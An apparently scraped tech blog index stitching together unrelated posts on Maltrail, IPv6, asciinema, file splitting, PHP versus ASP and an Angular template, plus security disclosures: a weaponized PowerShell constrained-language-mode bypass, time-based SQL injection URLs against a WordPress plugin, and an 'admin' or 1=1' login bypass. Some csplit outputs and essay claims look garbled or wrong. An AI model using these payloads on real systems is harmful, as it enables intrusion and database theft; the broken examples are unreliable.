siesta, silentbrute, silly, simda, sinkhole_abuse,
sinkhole_anubis, sinkhole_arbor, sinkhole_bitdefender,
sinkhole_blacklab, sinkhole_botnethunter, sinkhole_certgovau,
sinkhole_certpl, sinkhole_checkpoint, sinkhole_cirtdk,
sinkhole_conficker, sinkhole_cryptolocker, sinkhole_drweb,
sinkhole_dynadot, sinkhole_dyre, sinkhole_farsight,
sinkhole_fbizeus, sinkhole_fitsec, sinkhole_fnord,
sinkhole_gameoverzeus, sinkhole_georgiatech, sinkhole_gladtech,
sinkhole_honeybot, sinkhole_kaspersky, sinkhole_microsoft,
sinkhole_rsa, sinkhole_secureworks, sinkhole_shadowserver,
sinkhole_sidnlabs, sinkhole_sinkdns, sinkhole_sofacy,
sinkhole_sugarbucket, sinkhole_tech, sinkhole_unknown,
sinkhole_virustracker, sinkhole_wapacklabs, sinkhole_zinkhole,
skeeyah, skynet, skyper, smsfakesky, snake, snifula, snort,
sockrat, sofacy, sohanad, spyeye, stabuniq, stonedrill,
stuxnet, synolocker, tdss, teamspy, teerac, teslacrypt,
themida, tibet, tinba, torpig, torrentlocker, troldesh, turla,
unruy, upatre, utoti, vawtrak, vbcheman, vinderuf, virtum,
virut, vittalia, vobfus, volatilecedar, vundo, waledac,
waterbug, wecorl, wndred, xadupi, xcodeghost, xtrat, yenibot,
yimfoca, zaletelly, zcrypt, zemot, zeroaccess, zeus, zherotee,
zlader, zlob, zombrari, zxshell, etc.

Architecture

Maltrail is based on the Traffic -> Sensor <-> Server <-> Client architecture. Sensor(s) is a standalone component running on the monitoring node (e.g. Linux platform connected passively to the SPAN/mirroring port or transparently inline on a Linux bridge) or at the standalone machine (e.g. Honeypot) where it "monitors" the passing Traffic for blacklisted items/trails (i.e. domain names, URLs and/or IPs). In case of a positive match, it sends the event details to the (central) Server where they are being stored inside the appropriate logging directory (i.e. LOG_DIR described in the Configuration section). If Sensor is being run on the same machine as Server (default configuration), logs are stored directly into the local logging directory. Otherwise, they are being sent via UDP messages to the remote server (i.e. LOG_SERVER described in the Configuration section).

Server's primary role is to store the event details and provide back-end support for the reporting web application. In default configuration, server and sensor will run on the same machine. So, to prevent potential disruptions in sensor activities, the front-end reporting part is based on the "Fat client" architecture (i.e. all data post-processing is being done inside the client's web browser instance). Events (i.e. log entries) for the chosen (24h) period are transferred to the Client, where the reporting web application is solely responsible for the presentation part. Data is sent toward the client in compressed chunks, where they are processed sequentially. The final report is created in a highly condensed form, practically allowing presentation of virtually unlimited number of events.
Note: Server component can be skipped altogether, and just use the standalone Sensor. In such case, all events would be stored in the local logging directory, while the log entries could be examined either manually or by some CSV reading application.

Quick start

The following set of commands should get your Maltrail Sensor up and running (out of the box with default settings and monitoring interface "any"):

sudo apt-get install git python-pcapy

git clone https://github.com/stamparm/maltrail.git

cd maltrail

sudo python sensor.py

To start the (optional) Server on same machine, open a new terminal and execute the following:

[[ -d maltrail ]] || git clone https://github.com/stamparm/maltrail.git

cd maltrail

python server.py

To test that everything is up and running execute the following:

ping -c 1 136.161.101.53

cat /var/log/maltrail/$(date +"%Y-%m-%d").log

To stop Sensor and Server instances (if running in background) execute the following:

sudo pkill -f sensor.py

pkill -f server.py

Access the reporting interface (i.e. Client) by visiting the http://127.0.0.1:8338 (default credentials: admin:changeme!) from your web browser:

Malicious Traffic Detection System 101Scratch

Read More

Disable IPv6 Permantly

this tutorial is how to disable ipv6 on linux, for the first go to /etc/sysctl.conf and add the following script:

sudo nano /etc/sysctl.conf and add following lines

net.ipv6.conf.all.disable_ipv6 = 1
net.ipv6.conf.default.disable_ipv6 = 1
net.ipv6.conf.lo.disable_ipv6 = 1

Disable IPv6 Permantly.

Now run following command:

sudo sysctl -p

then your ipv6 automatically disabled by sysctl, to open it again simply delete the script above and do update sysctl back :)

Read More

How to Record Terminal Sessions

Install Asciinema

How to Record Terminal Sessions.

Linux Distro

Fedora

sudo yum install asciinema

Ubuntu

sudo apt-add-repository ppa:zanchey/asciinema

sudo apt-get update

sudo apt-get install asciinema

Arch Linux

pacman -S asciinema

Gentoo Linux

emerge -av asciinema

openSUSE

zypper in asciinema

via Pip

asciinema is available on PyPI and can be installed with pip (Python 3 required):

sudo pip3 install asciinema

This is the universal installation method for all operating systems, which always provides the latest version.

Record terminal session

This is the single most important command in asciinema, since it is how you utilize this tool’s main job.

By running asciinema rec [filename] you start a new recording session. The command (process) that is recorded can be specified with -c option (see below), and defaults to $SHELL which is what you want in most cases.

Recording finishes when you exit the shell (hit Ctrl+D or type exit). If the recorded process is not a shell then recording finishes when the process exits.

If the filename argument is given then the resulting recording (called asciicast) is saved to a local file. It can later be replayed with asciinema play <filename> and/or uploaded to asciinema.org with asciinema upload <filename>. If the filename argument is omitted then (after asking for confirmation) the resulting asciicast is uploaded to asciinema.org for further playback in a web browser.

ASCIINEMA_REC=1 is added to recorded process environment variables. This can be used by your shell’s config file (.bashrc, .zshrc) to alter the prompt or play a sound when shell is being recorded.

Replay recorded asciicast in a terminal

This command replays given asciicast (as recorded by rec command) directly in your terminal.

Playing from a local file:

asciinema play /path/to/asciicast.json

Playing from HTTP(S) URL:

asciinema play https://asciinema.org/a/22124.json

asciinema play http://example.com/demo.json

Playing from asciicast page URL (requires <link rel="alternate" type="application/asciicast+json" href="....json"> in page’s HTML):

asciinema play https://asciinema.org/a/22124

asciinema play http://example.com/blog/post.html

Playing from stdin:

cat /path/to/asciicast.json | asciinema play -

ssh user@host cat asciicast.json | asciinema play -

Playing from IPFS:

asciinema play ipfs:/ipfs/QmcdXYJp6e4zNuimuGeWPwNMHQdxuqWmKx7NhZofQ1nw2V

asciinema play fs:/ipfs/QmcdXYJp6e4zNuimuGeWPwNMHQdxuqWmKx7NhZofQ1nw2V

Available options:

-w, --max-wait=<sec> - Reduce replayed terminal inactivity to max seconds

NOTE: it is recommended to run asciinema play in a terminal of dimensions not smaller than the one used for recording as there’s no “transcoding” of control sequences for new terminal size.

Upload recorded asciicast to asciinema.org site

This command uploads given asciicast (as recorded by rec command) to asciinema.org for further playback in a web browser.

asciinema rec demo.json + asciinema play demo.json + asciinema upload demo.json is a nice combo for when you want to review an asciicast before publishing it on asciinema.org.

Manage recordings on asciinema.org account

If you want to manage your recordings on asciinema.org (set title/description, delete etc) you need to authenticate. This command displays the URL you should open in your web browser to do that.

On every machine you run asciinema recorder, you get a new, unique API token. If you’re already logged in on asciinema.org website and you run asciinema auth from a new computer then this new device will be linked to your account.

You can synchronize your config file (which keeps the API token) across the machines so all of them use the same token, but that’s not necessary. You can assign new tokens to your account from as many machines as you want.

Nara: Here

Read More

Exploiting PowerShell Code Injection Vulnerabilities to Bypass Constrained

Exploiting PowerShell Code.

Introduction

Constrained language mode is an extremely effective method of preventing arbitrary unsigned code execution in PowerShell. It’s most realistic enforcement scenarios are when Device Guard or AppLocker are in enforcement mode because any script or module that is not approved per policy will be placed in constrained language mode, severely limiting an attackers ability to execute unsigned code. Among the restrictions imposed by constrained language mode is the inability to call Add-Type. Restricting Add-Type makes sense considering it compiles and loads arbitrary C# code into your runspace. PowerShell code that is approved per policy, however, runs in “full language” mode and execution of Add-Type is permitted. It turns out that Microsoft-signed PowerShell code calls Add-Type quite regularly. Don’t believe me? Find out for yourself by running the following command:

ls C:\* -Recurse -Include '*.ps1', '*.psm1' |
Select-String -Pattern 'Add-Type' |
Sort Path -Unique |
% { Get-AuthenticodeSignature -FilePath $_.Path } |
? { $_.SignerCertificate.Subject -match 'Microsoft' }

Exploitation

Now, imagine if the following PowerShell module code (pretend it’s called “VulnModule”) were signed by Microsoft:

$Global:Source = @'
public class Test {
public static string PrintString(string inputString) {
return inputString;
}
}
'@

Add-Type -TypeDefinition $Global:Source

Any ideas on how you might influence the input to Add-Type from constrained language mode? Take a minute to think about it before reading on.

Alright, let’s think the process through together:

1. Add-Type is passed a global variable as its type definition. Because it’s global, its scope is accessible by anyone, including us, the attacker.
2. The issue though is that the signed code defines the global variable immediately prior to calling to Add-Type so even if we supplied our own malicious C# code, it would just be overwritten by the legitimate code.
3. Did you know that you can set read-only variables using the Set-Variable cmdlet? Do you know what I’m thinking now?

Weaponization

Okay, so to inject code into Add-Type from constrained language mode, an attacker needs to define their malicious code as a read-only variable, denying the signed code from setting the global “Source” variable. Here’s a weaponized proof of concept:

Set-Variable -Name Source -Scope Global -Option ReadOnly -Value @'
public class Injected {
public static string ToString(string inputString) {
return inputString;
}
}
'@

Import-Module VulnModule

[Injected]::ToString('Injected!!!')

A quick note about weaponization strategies for Add-Type injection flaws. One of the restrictions of constrained language mode is that you cannot call .NET methods on non-whitelisted classes with two exceptions: properties (which is just a special “getter” method) and the ToString method. In the above weaponized PoC, I chose to implement a static ToString method because ToString permits me to pass arguments (a property getter does not). I also made my class static because the .NET class whitelist only applies when instantiating objects with New-Object.

So did the above vulnerable example sound contrived and unrealistic? You would think so but actually Microsoft.PowerShell.ODataAdapter.ps1 within the Microsoft.PowerShell.ODataUtils module was vulnerable to this exact issue. Microsoft fixed this issue in either CVE-2017-0215, CVE-2017-0216, or CVE-2017-0219. I can’t remember, to be honest.

Prevention

The easiest way to prevent this class of injection attack is to supply a single-quoted here-string directly to -TypeDefinition in Add-Type. Single quoted string will not expand any embedded variables or expressions. Of course, this scenario assumes that you are compiling static code. If you must supply dynamically generated code to Add-Type, be exceptionally mindful of how an attacker might influence its input. To get a sense of a subset of ways to influence code execution in PowerShell watch my “Defensive Coding Strategies for a High-Security Environment” talk that I gave at PSConf.EU.

Mitigation

While Microsoft will certainly service these vulnerabilities moving forward, what is to prevent an attacker from bringing the vulnerable version along with them?

A surprisingly effective blacklist rule for UMCI bypass binaries is the FileName rule which will block execution based on the filename present in the OriginalFilename field within the “Version Info” resource in a PE. A PowerShell script is obviously not a PE file though - it’s a text file so the FileName rule won’t apply. Instead, you are forced to block the vulnerable script by its file hash using a Hash rule. Okay… what if there is more than a single vulnerable version of the same script? You’ve only blocked a single hash thus far. Are you starting to see the problem? In order to effectively block all previous vulnerable versions of the script, you must know all hashes of all vulnerable versions. Microsoft certainly recognizes that problem and has made a best effort (considering they are the ones with the resources) to scan all previous Windows releases for vulnerable scripts and collect the hashes and incorporate them into a blacklist here. Considering the challenges involved in blocking all versions of all vulnerable scripts by their hash, it is certainly possible that some might fall through the cracks. This is why it is still imperative to only permit execution of PowerShell version 5 and to enable scriptblock logging.

Another way in which a defender might get lucky regarding vulnerable PowerShell script blocking is due to the fact that most scripts and binaries on the system are catalog signed versus Authenticode signed. Catalog signed means that rather than the script having an embedded Authenticode signature, its hash is stored in a catalog file that is signed by Microsoft. So when Microsoft ships updates, eventually, hashes for old versions will fall out and no longer remain “signed.” Now, an attacker could presumably also bring an old, signed catalog file with them and insert it into the catalog store. You would have to be elevated to perform that action though and by that point, there are a multitude of other ways to bypass Device Guard UMCI. As a researcher seeking out such vulnerable scripts, it is ideal to first seek out potentially vulnerable scripts that have an embedded Authenticode signature as indicated by the presence of the following string - “SIG # Begin signature block”. Nara: Exploit-Monday

Read More

Splitting and Re-Assembling Files in Linux

Linux has several utilities for splitting up files.

So why would you want to split your files? One use case is to split a large file into smaller sizes so that it fits on smaller media, like USB sticks. This is also a good trick to transfer files via USB sticks when you're stuck with FAT32, which has a maximum file size of 4GB, and your files are bigger than that. Another use case is to speed up network file transfers, because parallel transfers of small files are usually faster.

We'll learn how to use csplit, split, and cat to chop up and then put files back together. These work on any file type: text, image, audio, .iso, you name it.

Split Files With csplit

csplit is one of those funny little commands that has been around forever, and when you discover it you wonder how you ever made it through life without it. csplit divides single files into multiple files. This example demonstrates its simplest invocation, which divides the file foo.txt into three files, split at line numbers 1 and 3:

$ csplit foo.txt 1
0
15

csplit creates three new files in the current directory, and prints the sizes of your new files in bytes. By default, each new file is named xxnn:

Splitting and Re-Assembling.

You can view the first ten lines of each of your new files all at once with the head command:

$ head xx0*
==> xx00 <==

==> xx01 <==
2591
3889
2359

What if you want to split a file into several files all containing the same number of lines? Specify the number of lines, and then enclose the number of repetitions in curly braces. This example repeats the split 4 times, and dumps the leftover in the last file:

$ csplit foo.txt 1 {3}
0
5
5
5

You may use the asterisk wildcard to tell csplit to repeat your split as many times as possible. Which sounds cool, but it fails if the file does not divide evenly:

$ csplit foo.txt 1 {*}
0
5
5
5

The default behavior is to delete the output files on errors. You can foil this with the -k option, which will not remove the output files when there are errors. Another gotcha is every time you run csplit it overwrites the previous files it created, so give your splits new filenames to save them. Use --prefix=prefix to set a different file prefix:

Splitting and Re-Assembling.

Splitting Files into Sizes

split is similar to csplit. It splits files into specific sizes, which is fabulous when you're splitting large files to copy to small media, or for network transfers. The default size is 1000 lines:

$ split foo.txt
$ ls
foo.txt  mine00  mine01  xaa

They come out to a similar size, but you can specify any size you want. This example is 20 megabytes:

$ split -b 20M foo.txt

The size abbreviations are K, M, G, T, P, E, Z, Y (powers of 1024), or KB, MB, GB, and so on for powers of 1000.
Choose your own prefix and suffix for the filenames:

$ split -a 3 --numeric-suffixes=9 --additional-suffix=mine foo.txt SB
240K Aug 21 17:44 SB009mine
214K Aug 21 17:44 SB010mine
220K Aug 21 17:44 SB011mine

The -a controls how many numeric digits there are. --numeric-suffixes sets the starting point for numbering. The default prefix is x, and you can set a different prefix by typing it after the filename.
Nara: Here

Read More

Exploit: WordPress Plugin Easy Modal 2.0.17 - SQL Injection

WordPress Easy Modal Plugin - Multiple Security Vulnerabilities

Advisory ID: DC-2017-01-007

Advisory Title: WordPress Easy Modal Plugin Multiple

Easy Modal.

Vulnerabilities

• Software: WordPress Easy Modal plugin
• Language: PHP
• Version: 2.0.17 and below
• Vendor Status: Vendor contacted, update released
• Release Date: 2017/08/07
• Risk: Medium 

1. General Overview

During the security audit of Easy Modal plugin for WordPress CMS, multiple vulnerabilities were discovered using DefenseCode ThunderScan application source code security analysis platform.

2. Software Overview

According to the plugin developers, Easy Modal is the #1 WordPress Popup Plugin. It's advertised as "Make glorious & powerful popups and market your content like never before - all in minutes!".
According to wordpress.org, it has more than 20,000 active installs.
Homepage:
http://wordpress.org/extend/plugins/easy-modal/
https://easy-modal.com

3. Vulnerability Description

During the security analysis, ThunderScan discovered SQL injection vulnerabilities in Easy Modal WordPress plugin.

The easiest way to reproduce the vulnerability is to visit the provided URL while being logged in as administrator or another user that is authorized to access the plugin settings page. Users that do
not have full administrative privileges could abuse the database access the vulnerability provides to either escalate their privileges or obtain and modify database contents they were not supposed to be
able to.

The nonce token is required as the URL parameter. Token value is not unique for each request, nor per each URL, so if the attacker manages to obtain a valid token value, the module could be exposed to attack vectors such as Cross Site request forgery (CSRF).

3.1. SQL injection

• Function: $wpdb->query()
• Variables: $_GET['id'], $_GET['ids'], $_GET['modal']
• Sample URL:
• http://vulnerablesite.com/wp-admin/admin.php?page=easy-modal&action=dele
• te&id%5B0%5D=4%20AND%20SLEEP(5)&easy-modal_nonce=xxx
• File: easy-modal\classes\controller\admin\modals.php

3.2. SQL injection

• Function: $wpdb->query()
• Variables: $_GET['id'], $_GET['ids'], $_GET['modal']
• Sample URL:
• http://vulnerablesite.com/wp-admin/admin.php?easy-modal_nonce=xxx&_wp_ht
• tp_referer=%2Fvulnerablesite.com%2Fwp-admin%2Fadmin.php%3Fpage%3Deasy-mo
• dal%26status%3Dtrash&page=easy-modal&action=untrash&paged=1&id[]=2)%20AN
• D%20SLEEP(10)--%20ZpVQ&action2=-1
• File: easy-modal\classes\controller\admin\modals.php

4. Credits

by Neven Biruski. | DB

Read More

Fundamentals of ASP.Net programming vs. PHP programming

It's actually a vast unwanted debate between PHP and ASP.NET, the battle continues between the supporters of these two programming languages, with no clear conclusion coming out. Both of these programming languages can be used to develop the same type of projects, the difference is just cost, platform independency, security etc.

Hyper-text-pre-processor (PHP) and Active-server-pages (ASP).

Hyper-text-pre-processor (PHP) and Active-server-pages (ASP) are the two standard programming languages for website application development and more significantly when it comes to produce database-driven websites to interrelating hugely with databases. PHP is an open-source programming language which is derived from lots of different languages. On the other hand ASP is such kind of programming languages which preferring Microsoft product mostly.

Both programming languages PHP and ASP are used to develop dynamic database oriented websites. Active Server Pages (ASP) is normally from Microsoft and is used only with Internet Information Server (IIS) that runs on Microsoft Servers also. But on the other hand you can say PHP is platform independent programming languages and can connect with several kinds of databases.

There are a lot of differences between ASP and PHP.

Expenditure

To run ASP.net programs first need to install IIS on a Windows server platform, this is not a free package. PHP programs can run on Linux, which is free package. Even the database connectivity is expensive for ASP, because it require MS-SQL product of Microsoft that needs to be acquired. Same time on the other hand PHP generally uses MySQL for database connectivity, which is freely accessible.

The Simplicity in Coding

PHP codes itself are very light in weight, a contract programmer who begins his career into PHP, does not felt any pressure to look the source code to understand. Whereas In ASP codes are not so easy to quick understand.

Database Compatibility

PHP generally being extremely flexible as it uses MySQL for database connectivity, which is freely accessible. Same time on the other hand Database compatibility is expensive for ASP, because it require MS-SQL product of Microsoft that needs to be acquired.

General Run Time

If we evaluate the running speed of PHP and ASP then PHP should gets the upper hand. Normally it is viewed that PHP code runs quicker than ASP code. Due to COM based architecture, ASP uses server space to run while PHP code runs on its own inbuilt memory space.

Background Language Support

ASP has a similar like Visual Basic type of syntax that also linked to Microsoft products as well. On the other hand PHP codes are based on generally C++ language and the syntax, which is used in PHP, is quite similar to C/C++ syntax. C/C++ is still considered by maximum software programmer is the finest programming language and people who love C++ language would certainly feel more relaxed with the PHP syntax.

Running Platform Connectivity

PHP codes can run on different platforms like UNIX, Solaris, Linux, and Windows whereas ASP codes are mostly linked with Windows platforms. Though, ASP programs can run on a Linux platform with the help of ASP-Apache installed on the server.

Further Tools Cost

Several tools used in PHP are mostly free of cost in the market and as PHP is open source a lot of codes can be available in open source forums and blogs. PHP has inbuilt attributes like ftp, encryption methods, even email also from a web page but in ASP such attributes are not obtainable and for this reason only some more features are required which are not free that increase the total cost as well.

Larger Applications Support

PHP is just as protected as ASP from coding level. The main difference is only for private data like “social security numbers”; “PIN numbers” etc. ASP is more practicable option. Organizations like government firms normally don’t have much stipulated commercial budgets and looking for required security, they really helpful ASP.net.

At the end, we can make a conclusion that both programming languages have their advantages and disadvantages specific to user requirement. It can be said that both the programming languages have their own significance depending upon the user's requirements and budgets. It is viewed that in any discussion board, ASP.net is similarly capable but many of them suggesting PHP for small business owners those who have a fixed budget and does not required superb security support. PHP cannot provide e-commerce application developmentFeature Articles, only for them ASP.net will be the best choice.

Read More

Exploit: Schools Alert Management - SQL injection login bypass

Schools Alert Management.

Schools Alert Management - SQL injection login bypass, an attacker is able to inject malicious sql query to bypass the login page and login as admin of the particular school.

Proof of Concept: http://localhost/schoolalert/demo_school_name/schools_login.php  [ set username and password ] to >>  admin' or 1=1 - you must choose the check box as management

Exploit Author: Ali BawazeEer
Dork: N/A
Date: 28.08.2017
Vendor Homepage: http://www.phpscriptsmall.com/product/schools-alert-management-system/
Version: 2.01
Category: Webapps
Tested on: Win / Mozila Firefox

Read More

PaperAdmin Template With Angular JS

A flat admin dashboard using Angular JS 2/4

PaperAdmin

PaperAdmin is a bootstrap single page dashboard developed using Angular JS 4. PaperAdmin features built-in components to make dashboard development easy. It features custom components such as calendars, list views with CRUD(Create, Read, Update, Delete) functionality, pie charts with status and custom cards to display relevant information.

Development server

Run ng serve for a dev server. Navigate to http://localhost:4200/. The app will automatically reload if you change any of the source files.

Build

Run ng build to build the project. The build artifacts will be stored in the dist/ directory. Use the -prod flag for a production build.

Template.

Demo | Downloads

Template.

Read More